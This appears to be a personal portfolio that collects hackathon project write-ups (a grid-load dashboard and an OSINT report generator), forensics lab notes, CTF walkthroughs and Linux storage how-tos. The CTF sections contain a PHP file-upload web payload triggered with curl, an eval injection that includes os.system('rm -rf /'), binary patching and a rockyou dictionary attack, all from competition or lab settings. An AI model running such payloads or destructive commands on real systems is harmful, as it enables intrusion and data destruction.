Tools used: Codex, Python, Next.js, React, TypeScript, Tailwind, Recharts, Deck.gl, Vercel

TL;DR: SCSP AI+ Expo Hackathon was part of SCSP’s 2026 National Security Technology Hackathon programming. The prototype weekend ran April 25-26, 2026, across San Francisco, Washington, DC, and Boston, with final demos tied to the AI+ Expo in Washington, DC.

Project

I built Flex Watt for the Electric Grid Optimization track. The challenge was about the pressure AI data centers are putting on the electrical grid: build agents or systems that forecast demand, coordinate supply, or keep the grid stable under rising compute load.

The idea I chose was narrow on purpose:

AI data centers do not have to behave like rigid 24/7 peak loads.

If large GPU clusters can reduce, defer, or move non-critical work during grid stress, they can behave more like conditional load. Real-time inference stays protected, but training, batch inference, and low-priority jobs can flex.

The project is an interactive grid dashboard that compares rigid AI data centers against flexible AI data centers during a replay of a grid stress event.

Workflow and Design

The core story is:

1. The grid has off-peak headroom most of the time.
2. Rigid AI data centers make peak stress worse.
3. Flexible AI data centers can reduce demand during scarcity.
4. The reduction happens by shifting non-critical workloads, not by turning off everything.

The live app lets you choose added AI load scenarios of 1 GW, 3 GW, or 5 GW, then run a 72-hour stress replay. In rigid mode, the data centers continue drawing power through the peak. In flexible mode, the fleet curtails training and batch work, transfers some deferrable load, and keeps priority inference protected.

I wanted the demo to feel like a grid operations dashboard, not a slideshow. It shows grid load, headroom, stress level, an ERCOT-style fleet map, event signals, workload states inside each data center, and a result card at the end of the replay.

Backend

The backend and data layer are intentionally simple. The flow is:

ERCOT data -> Python pipeline -> replay data -> simulation -> dashboard

The project uses ERCOT 2023 hourly native load data. I built a small Python data pipeline that parses the source workbook from a zip file, validates the full 8,760-hour year, preserves ERCOT local time labels, and emits frontend-ready JSON.

The processed dataset includes:

• 8,760 hourly records for 2023
• a 72-hour September 2023 stress replay
• annual peak and average load metrics
• zone-level load values
• event metadata for the dashboard

One important caveat: the stress labels in the demo are modeled labels for replay. They are not real PRC reserve data. I kept that caveat visible because grid demos can become misleading fast if the assumptions are hidden.

The frontend simulation is deterministic. That was intentional. I did not want an LLM deciding grid operations in the core loop.

The app models a fleet of AI data centers across ERCOT regions. Each data center has workload categories:

• real-time inference
• priority inference
• batch inference
• training / fine-tuning
• low-priority jobs

When grid stress rises, Flex Watt computes a curtailment intensity. Low-priority work drops first, training and batch jobs reduce next, priority inference is mostly protected, and real-time inference is never curtailed in the demo model.

What Worked

The strongest part of the prototype is the single-lever comparison. A viewer can run the replay and immediately see the difference between rigid load and flexible load.

The important part is not just reducing megawatts. It is showing graceful degradation. A training run might take longer, but the user-facing AI service stays online and the grid gets some headroom back.

Codex helped me move quickly across the stack: data processing, UI composition, simulation logic, and deployment wiring. But the project still needed a human design decision: keep one clear story and avoid pretending the prototype solved the entire grid.

Limitations

• The stress labels are modeled demo labels, not real PRC reserve data.
• The simulation is a prototype, not production grid-control software.
• A real deployment would need interconnection constraints, live market and reserve data, facility-level workload telemetry, and operator policy controls.

The hardest part was deciding what not to build. The problem statement was broad enough to invite forecasting, optimization, grid modeling, agent planning, dispatch, renewable integration, and demand response. In a hackathon, trying to build all of that would have produced a weak demo.

So I pulled one lever: flexible AI load.

Why It Matters

The real-world question is not just “can we add more load?” It is “can the load behave better when the system is stressed?”

Even as a prototype, the point is useful: AI infrastructure should not only consume power from the grid. It should become responsive to grid conditions.

That is the technical direction I wanted to demonstrate: AI data centers as flexible grid participants, not just bigger demand spikes.

Thanks

Thanks to the Special Competitive Studies Project for organizing the hackathon as part of AI+ Expo organizers for creating the track and problem space.

References

• SCSP AI+ Expo Hackathon
• Flex Watt live demo

Tools used: Codex, Claude Code, Cursor, Gemini, Groq, Python, Next.js, Supabase, Vercel, Tavily

TL;DR: DC Critical Ops was a three-day national security hackathon in Washington, DC, from April 17-19, 2026, organized by Johns Hopkins University, Georgetown University and George Washington University.

Project

I built BLUF Generator for analysts who need to turn open-source reporting into structured intelligence-style reports. BLUF means Bottom Line Up Front, a writing style used in military and intelligence reporting where the main judgment comes first.

The project is an agentic summarization pipeline for publicly available information. It ingests reporting, extracts evidence, estimates source quality, cross-references claims, and drafts a BLUF-style analytic product for human review.

The interesting question was not “can an LLM summarize an article?” The harder problem was whether an AI system could preserve the shape of serious analysis: source quality, evidence, uncertainty, confidence, alternative explanations and review before release.

Workflow and Design

The live app is a Next.js dashboard for OSINT analysis. The interface starts with a topic and routes it through a backend pipeline:

1. Collect or retrieve sources for the topic.
2. Run source intake and extract evidence.
3. Assign source and information quality signals using Admiralty-style reliability and credibility ratings.
4. Generate a draft BLUF and key judgments.
5. Run a tradecraft gate against analytic-quality standards.
6. Persist sources, evidence, draft products, judgments, and trace events in Supabase.

The deployed version has quick-select topics like China-Taiwan, Strait of Hormuz, and NATO expansion. I chose these because they are messy national security questions where confident-sounding summaries can be dangerous if they hide uncertainty.

Backend

The backend is a Vercel-compatible Next.js App Router application. The intended flow is:

topic -> source intake -> evidence -> draft -> tradecraft gate -> product

Supabase stores the important objects: sources, evidence, products, judgments, and trace events. The UI is designed to show not only the final answer, but also the path the answer took:

• sources used
• evidence extracted
• agent step executed
• review gate result

Gemini and Groq are used in the agent layer. Tavily supports live web search when real-time OSINT is enabled. The architecture also includes a doctrine layer:

• Tradecraft rules
• Source-rating logic
• Structured analytic technique ideas
• BLUF-first writing constraints

What Worked

The strongest part of the prototype is the workflow framing. The app does not just ask a model for a response. It separates collection, source evaluation, drafting and review, which makes the final result easier to inspect and criticize.

The trace view is important because it shows that the system did not jump from topic to answer. It routed the request, found or ingested material, generated a product and checked that product against a standard.

Limitations

• The current agentic layer is closer to a linear sourced-draft pipeline than a full multi-agent analytic workflow.
• The structured analytic technique layer exists in the design and data model, but it is not reliably wired into the normal execution path.
• The current version is not yet a finished intelligence drafting platform.

The app is also affected by an agent orchestration issue, so the public demo may not fully represent the intended workflow at all times. I will update the project once the pipeline is stable.

Why It Matters

The real-world use case is an analyst workspace, not a replacement for analysts. A tool like this can help analysts move faster through source triage, evidence organization and first-draft generation, while making uncertainty visible.

The important work was scoping the workflow, keeping the product grounded in tradecraft, and deciding what not to claim before the system actually works.

Thanks

Thanks to Johns Hopkins University, Georgetown University and George Washington University for organizing the hackathon. Thanks also to the sponsors across defense technology, AI, and national security.

References

• Critical Ops Hackathon
• BLUF Generator live demo

Part 1: Analyze PCAP for Forensics Evidence

Plot: The lab involves incident response scenario where confidential files were exfiltrated from the corporate network. We are conducting forensic investigations using NetWitness Investigator Freeware and Paraben’s E3.

Network Traffic Analysis

The security incident involved exfiltration of confidential company data - we are analyzing pcap and found the files below that were exfiltrated by the user.

NetWitness Investigator is an enterprise-level threat analysis platform developed by RSA and designed to contextualize network activity and efficiently identify malicious activity

Part 2: Analyze Disk Image for Forensic Evidence

1. Email Forensics - The disk image was taken from the laptop of a Giggly Goofo employee named Marvin Jonson, whom the security team have reason to suspect may be involved in the data exfiltration incident. We will use E3 to analyze and look through content.

   We found emails from Marvin’s disk image during forensics that clearly depicts malicious instructions provided by the threat actor. Below is the evidence.

   Instructions to change firewall rules

   Asking to install keylogger, which can record all key activities

2. Registry forensics - Checking firewall rules and installation location of keylogger

   • Advanced Search in Firewall Policy under - Incident Response -> Registry -> Data Triage

   • Open Result and analyze data for keylogger - Port - 666 
Location - C:\ProgramData\SecurityMonitor\{AKC34567-KCQR-WW34-AK47-INUM489023MY}\akl.exe 
Name - Actual Keylogger

     

Attack Timing - 
   `Start Time - 1625087483  - Wednesday, June 30, 2021 9:11:23 PM
   `End Time  0
   `Expiration Time - 1627679483 - Friday, July 30, 2021 9:11:23 PM
   `Last Modified Time - 1625087483

These Labs are based on Digital Forensics, Investigation, and Response 4th Edition by Dr Chuck Easttom

Section 1: Hands on Demonstration

Part 1 Detect Steganography Software on a Drive Image

• We will be checking if stegnography software has been installed on user’s/suspect’s drive image using a specialized hash database.
• Specialized Hash Database - Contains MD5 hash values of popular steganography tools. It can help detect software even if name has been changed to hide software itself.

1. Open E3

2. Open Case

3. Add Evidence File (Existing in this case) & Import Hash Database for comparing image hashes with hash database to check if the user has installed any stegnography applications to hide content.

   1. Import Hash Database 1.pdh from bottom left corner Hashes option. In this virtual machine, hashes were pre downloaded, you can download similar databases from NIST

      

   2. Then Go to Analysis -> Sorted Files Search 1

      

   3. Move Hash Database 1.pdh to Accepted databases

      

   4. Now Check Sorted Files(on left) -> Run Query

      

   5. Found One Entry -> Open using Show Links

      

   6. Turns out this is renamed file of OpenPuff tool which means some data might be hidden by suspect here using this OpenPuff

      

Part 2: Detect Hidden Data in Image Files

1. Lets say we found a suspicious folder with multiple files - GIFs, txt, etc.

2. First Export Folder to another location by Right Click -> Export

3. Use StegExpose to find which file has hidden data java -jar "C:\Program Files (x86)\StegExpose-master\StegExpose.jar" "C:\Users\Administrator\Documents\E3 Cases\Beverly Gates evidence\Sent"

   • Location of StegExpose: C:\Program Files (x86)\StegExpose-master\StegExpose.jar
   • Location of Folder: C:\Users\Administrator\Documents\E3 Cases\Beverly Gates evidence\Sent

These Labs are based on Digital Forensics, Investigation, and Response 4th Edition by Dr Chuck Easttom

Jeopardy Style - Reverse Engineering Challenges
1. What’s Up
2. Do You Even Rev Bro?
Attack Defense - King of The Hill

Jeopardy Style

Reverse Enginnering

What’s Up?

Description - We have to connect to given ip using netcat (nc 0.cloud.chals.io 25649) which contains flag. Binary of program running on server is also provided - “challenge”.

• Opened given binary “challenge” in ghidra
• flag.txt is on server but not printed by main function
• We can do Buffer Overflow on local_38 by entering any value > 32 (its size)

Do You Even Rev Bro?

Description - Given Binary

• Opened binary in ghidra
• Main/entry Function
• Double Click to open FUN_00401227
• Decryption Taking Place in this function
• Line 37 checks for correct key to be entered
• 
• We can change if (iVar1 == 0) to get true every time to decrypt & print flag regardless of entered key by user
• Change jnz to je so that if (iVar1 == 0) is always true
• I used Cutter to edit assembly function from jnz to jz since it is easier in cutter
• Close file in cutter without saving
• Run Patched Binary in Terminal
• Summit_CTF{idk_h0w_t0_c0d3}

Attack Defense - King of The Hill Castle

Infrastructure Description -

• 4 Machines with Each Team, all teams have same machines
• All 4 Machines running Web Servers
• Total 12 Teams
• Flags stored in /tmp/flag.txt & /root/flag.txt & Updated Every 10 minutes
• Initial Login using SSH - Credentials Provided by Organizers

Scoring

• We were scored for submitting both our flags on our 4 machines and other machines that we pwned
• If someone could destroy our machines(make them inaccessible to use), we couldn’t submit our flag => –points and vice-versa

Competing: I worked on Attack side while my other two teammates worked on system hardening and fixing vulnerabilities

• Scanning - Started with nmap scan on whole subnet
• Found File-Upload option in File Upload Vulnerable Machines

http://172.30.1.61 & 81,91,101,111,121

• Exploit Make Exploit $ nano intigriti.png.php <?php echo file_get_contents('/tmp/flag.txt'); ?>

Go To -> http://172.30.1.61/ -> UPLOAD intigriti.png.php

RUN in Terminal curl http://172.30.1.61/uploads/intigriti.png.php flag_xyz........

• We collected the flags from terminal and uploaded them on scoreboard
• Intially we did good on both attack & defense side during second half but couldn’t pwn all machines

Conclusion Overall Amazing Experience in King of The Hill. Will improve by automating flag submission as one of the other teams did from UNG, manually retrieving and submitting flags is slow and boring.

$file shipped.db

• Tried to open with OpenSQLite browser but couldn’t open it. Shows encrypted.

• Then found out it is not an encrypted file:

$fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt shipping.db                         
'mimetype' is not encrypted, skipping
'Configurations2/toolpanel/' is not encrypted, skipping
'Configurations2/progressbar/' is not encrypted, skipping
'Configurations2/statusbar/' is not encrypted, skipping
'Configurations2/toolbar/' is not encrypted, skipping
'Configurations2/floater/' is not encrypted, skipping
'Configurations2/popupmenu/' is not encrypted, skipping
'Configurations2/menubar/' is not encrypted, skipping
'manifest.rdf' is not encrypted, skipping
found id 6ecd93cd, 'shipping.db' is not a zipfile ver 2.xx, skipping
no usable files found

• After Unzipping, tried to view content of content.xml: All Gibbrish

• Tried to reconstruct it in readable format:

  $zip -r ../files.odt *
  

• Word & Libreoffice don’t show good format, not readable and cannot be analyzed

• Reconstructing to Sqlite file using python script.

• Finally reconstructed after trial and error.

• Found Guardian Armamenet a suspicious company from Thumbnails.png after Googling all companies names

Random Entry for a different addresss at No:899 which is suspicous

Boom Flag

Task 2

Create ZFS Pool on Ubuntu using following commands:

$lsblk
$sudo fallocate -l 1G /tmp/zfs-disk.img
$sudo losetup -fP /tmp/zfs-disk.img
$losetup -a
$lsblk
$sudo zpool create nkfipool /dev/loop46
$sudo zfs create nkfipool/rjfs
$zfs list -t snapshot
$zpool list

If directory is hidden:

$sudo zfs get snapdir nkfipool/rjfs
$sudo zfs set snapdir=visible nkfipool/rjfs
$sudo zfs get snapdir nkfipool/rjfs

Info on Pool:

$sudo zdb -vvv nkfipool/rjfs

Manually Recover each Snapshot SEQUENTIALLY using source GUID & Destination GUID:

View GUID:

$ for f in *; do file "$f"; done | cut -d':' -f1,4,5 | column -t -s ':'
$ sudo zfs receive nkfipool/rjfs > logseq24006643128753-i

Check directory of each recovered snapshot: :/nkfipool/rjfs/planning/pages

$ ls
 contents.md        'Elliptic curve recovery.md'   LLM.md   'token generation.md'  'ZFS snapshots.md'
'CUDA elliptic.md'   golang.md                     todo.md   tools.md

Do checksum of each file

Write Script to do checksum of each file, then print it:

#!/bin/bash

# Base directory where all logseq directories are stored
BASE_DIR="/nkfipool/rjfs/.zfs/snapshot"

# List of logseq directories
LOGSEQ_DIRS=(
    "logseq11079254764090"
    "logseq11652828730004"
    "logseq11865316111135"
    "logseq1275510227140"
    "logseq169607977607"
    "logseq1838778124435"
    "logseq18584850428477"
    "logseq211821980113211"
    "logseq24006643128753"
    "logseq259372600032543"
    "logseq263292687127458"
    "logseq269718728817"
    "logseq27077118912783"
    "logseq30280209123973"
    "logseq307981931423438"
    "logseq4015160425167"
    "logseq73041633518013"
    "logseq77311709316810"
    "logseq81871640320073"
    "logseq98931947620095"
)

# Iterate through each logseq directory
for logseq_dir in "${LOGSEQ_DIRS[@]}"; do
    # Directory containing files
    PAGES_DIR="$BASE_DIR/$logseq_dir/planning/pages"
    
    # Check if the directory exists
    if [ -d "$PAGES_DIR" ]; then
        #echo "Processing files in $PAGES_DIR"
	echo ""
        
        # Iterate through each file in the pages directory
        for file in "$PAGES_DIR"/*; do
            if [ -f "$file" ]; then
                # Print the SHA256 checksum of the file
                sha256sum "$file"
            fi
        done
    else
        #echo "Directory $PAGES_DIR does not exist or is inaccessible."
	echo ""
    fi
done

Boom You’ve got all checksums

Have you ever encountered your QEMU-KVM Virtual Machine Image in qcow2 format eating your storage space? If yes, today we will solve that problem. The problem is due to thin provisioning

QEMU-KVM Virtual Machine(VM) Images take extra space with snapshots as original image size increases. We will restore the image to minimal size, deleting extra space occupied by snapshots.

General

• Snapshots acquire double space that of virtual disk and don’t erase back automatically.
• Delete Snapshots using CLI(qemu-img)
• Always try to use cli qemu for creating VMs and operating them

ls cannot understand thin provisioning , use Disk Utility du instead

Here is my sample disk size:

qemu-img

• qemu-img info Qubes.qcow2

Deleting Snapshots

• sudo qemu-img snapshot -d snapshot2(name) CTF.qcow2

virt-sparsify

Free space within the disk image can be converted back to free space on the host. Check documentation for all features.

• sudo virt-sparsify -v -x --in-place CTF.qcow2
• sudo virt-sparsify CTF.qcow2 compressedCTF.qcow2

Before Compression

After Compression

My First Pwnie

#!/usr/bin/env python3

# Pwn mostly builds on top of rev.
# While rev is more about understanding how a program works, pwn is more about figuring out how to exploit a program to reach the holy grail: Arbitrary Code Execution
#
# If you can execute arbitrary code on a system, that system might as well be yours...because you can do whatever you want with it! (this is the namesake of "pwn".....if you pwn a system, you own the system)
# Of course, that comes with the limitations of the environment you are executing code in...are you a restricted user, or a super admin?
# Sometimes you can make yourself a super admin starting from being a restricted user.....but we're not gonna do that right now.
#
# For now, I want you to figure out how to execute arbitrary commands on the server running the following code.
#
# To prove to me that you can excute whatever commands you want on the server, you'll need to get the contents of `/flag.txt`

try:
  response = eval(input("What's the password? "))
  print(f"You entered `{response}`")
  if response == "password":
    print("Yay! Correct! Congrats!")
    quit()
except:
  pass

print("Nay, that's not it.")

I tried different commands such as:

import('subprocess').getoutput('cat flag.txt')
import('os').system('rm -rf /')

Then finally connected to server using Netcat

Flag: 🚩 csawctf{neigh______}

Overall Positon: Second

Prize Won: INR 10,000

24 Hours Hackathon

Organizer: Amity University, 18th- 19th January 2023

Problem Statement: Cybersecurity and Blockchain:

You are the Lead Cybersecurity Architect for Cybersecurity and Compliance (CSAC) department In 2020, University discovered a serious cyber-attack. There was a Supply Chain Attack as advised by a trusted intel. As Lead Cybersecurity Architect, develop a cybersecurity program for university and present your strategy for detection, containing and removal of the malware as well as your implementation and execution roadmap to the Executive Committee (EC) using NIST Framework.

Our Solution(Upload Pending):

I am thrilled to share the story of how my team, Pirates Bay, achieved an incredible victory in the Cybersecurity & Blockchain Domain out of three domains.

In order to make the story seem realistic we designed a scenario of attacking a Systems Engineer with Admin Privileges from a famous Supply Chain Service Provider to the College.

Will be updating it soon with our script that we created to analyze network logs and setup Honey Pots

CyberCup 3.0 2024

Overall Positon: Third

Startup Incubator Fund: INR 20,000

Cash Prize: INR 2,000

AWS Subscriptions

Organizer: Amity University, 28th January 2024

Problem Statement: Design a SIEM like tool to monitor network activity and visually represent network traffic and other indicators of compromise to network administrator.

Solution(Will Upload Soon)